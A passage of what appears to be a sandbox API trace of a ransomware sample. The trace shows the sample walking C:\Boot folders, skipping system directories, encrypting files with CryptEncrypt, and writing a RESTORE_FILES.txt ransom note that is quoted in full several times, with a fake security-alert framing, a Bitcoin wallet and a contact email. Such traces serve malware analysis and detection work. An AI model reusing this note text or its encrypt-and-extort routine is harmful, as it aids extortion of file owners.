pszDest="\\\\?\\C:\\Boot\\en-US\\*") returned 19 [0044.576] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\en-US\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c00 [0044.576] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.576] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.576] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.576] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.576] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.576] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\.") returned 19 [0044.576] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.576] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.576] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.576] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.576] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.576] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.576] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.576] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\..") returned 20 [0044.576] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.576] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.576] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.576] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.576] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.576] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.576] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.576] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.576] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui") returned 33 [0044.576] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.576] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.576] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.576] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c40*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447c40*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.576] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.577] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.577] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0044.577] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0044.577] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.577] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.577] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0044.577] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui") returned 33 [0044.577] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".protected") returned 0x0 [0044.577] lstrcmpW (lpString1="memtest.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.577] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.577] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c40*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447c40*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.577] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.577] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.577] FindClose (in: hFindFile=0x447c00 | out: hFindFile=0x447c00) returned 1 [0044.577] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\RESTORE_FILES.txt") returned 35 [0044.577] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\RESTORE_FILES.txt" (normalized: "c:\\boot\\en-us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0044.577] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.577] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.578] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0044.578] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.578] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.578] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0044.578] CloseHandle (hObject=0xa4) returned 1 [0044.578] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.578] lstrcmpiW (lpString1="es-ES", lpString2="Windows") returned -1 [0044.578] lstrcmpiW (lpString1="es-ES", lpString2="Program Files") returned -1 [0044.578] lstrcmpiW (lpString1="es-ES", lpString2="Program Files (x86)") returned -1 [0044.578] lstrcmpiW (lpString1="es-ES", lpString2="$Recycle.bin") returned 1 [0044.578] lstrcmpiW (lpString1="es-ES", lpString2="System Volume Information") returned -1 [0044.578] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES") returned 17 [0044.578] lstrcmpW (lpString1="es-ES", lpString2=".") returned 1 [0044.578] lstrcmpW (lpString1="es-ES", lpString2="..") returned 1 [0044.578] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\*") returned 19 [0044.578] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\es-ES\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c00 [0044.579] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.579] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.579] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.579] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.579] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.579] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\.") returned 19 [0044.579] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.579] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.579] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.579] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.579] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.579] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.579] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.579] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\..") returned 20 [0044.579] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.579] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.580] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.580] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.580] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.580] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.580] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.580] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.580] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 33 [0044.580] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.580] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.580] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.580] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c40*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447c40*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.580] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.580] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.580] FindClose (in: hFindFile=0x447c00 | out: hFindFile=0x447c00) returned 1 [0044.580] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\RESTORE_FILES.txt") returned 35 [0044.580] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\RESTORE_FILES.txt" (normalized: "c:\\boot\\es-es\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0044.580] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.580] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.581] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0044.581] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.581] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.581] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0044.581] CloseHandle (hObject=0xa4) returned 1 [0044.581] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.581] lstrcmpiW (lpString1="fi-FI", lpString2="Windows") returned -1 [0044.581] lstrcmpiW (lpString1="fi-FI", lpString2="Program Files") returned -1 [0044.581] lstrcmpiW (lpString1="fi-FI", lpString2="Program Files (x86)") returned -1 [0044.581] lstrcmpiW (lpString1="fi-FI", lpString2="$Recycle.bin") returned 1 [0044.581] lstrcmpiW (lpString1="fi-FI", lpString2="System Volume Information") returned -1 [0044.581] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI") returned 17 [0044.581] lstrcmpW (lpString1="fi-FI", lpString2=".") returned 1 [0044.581] lstrcmpW (lpString1="fi-FI", lpString2="..") returned 1 [0044.581] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\*") returned 19 [0044.581] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fi-FI\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c00 [0044.582] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.582] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.582] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.582] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.582] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.582] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\.") returned 19 [0044.582] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.582] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.582] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.582] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.582] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.582] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.582] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.582] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\..") returned 20 [0044.582] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.582] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.582] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.582] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.582] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.582] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.582] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.582] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.582] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned 33 [0044.582] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.582] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.582] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.582] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c40*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447c40*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.582] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.582] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.582] FindClose (in: hFindFile=0x447c00 | out: hFindFile=0x447c00) returned 1 [0044.582] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\RESTORE_FILES.txt") returned 35 [0044.582] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\RESTORE_FILES.txt" (normalized: "c:\\boot\\fi-fi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0044.583] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.583] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.583] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0044.583] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.583] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.583] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0044.583] CloseHandle (hObject=0xa4) returned 1 [0044.584] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.584] lstrcmpiW (lpString1="Fonts", lpString2="Windows") returned -1 [0044.584] lstrcmpiW (lpString1="Fonts", lpString2="Program Files") returned -1 [0044.584] lstrcmpiW (lpString1="Fonts", lpString2="Program Files (x86)") returned -1 [0044.584] lstrcmpiW (lpString1="Fonts", lpString2="$Recycle.bin") returned 1 [0044.584] lstrcmpiW (lpString1="Fonts", lpString2="System Volume Information") returned -1 [0044.584] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts") returned 17 [0044.584] lstrcmpW (lpString1="Fonts", lpString2=".") returned 1 [0044.584] lstrcmpW (lpString1="Fonts", lpString2="..") returned 1 [0044.584] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\*") returned 19 [0044.584] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\Fonts\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c80 [0044.587] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.587] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.587] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.587] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.587] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.587] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\.") returned 19 [0044.587] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.587] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.587] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.587] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.587] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.587] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.587] lstrcmpiW (lpString1="..", 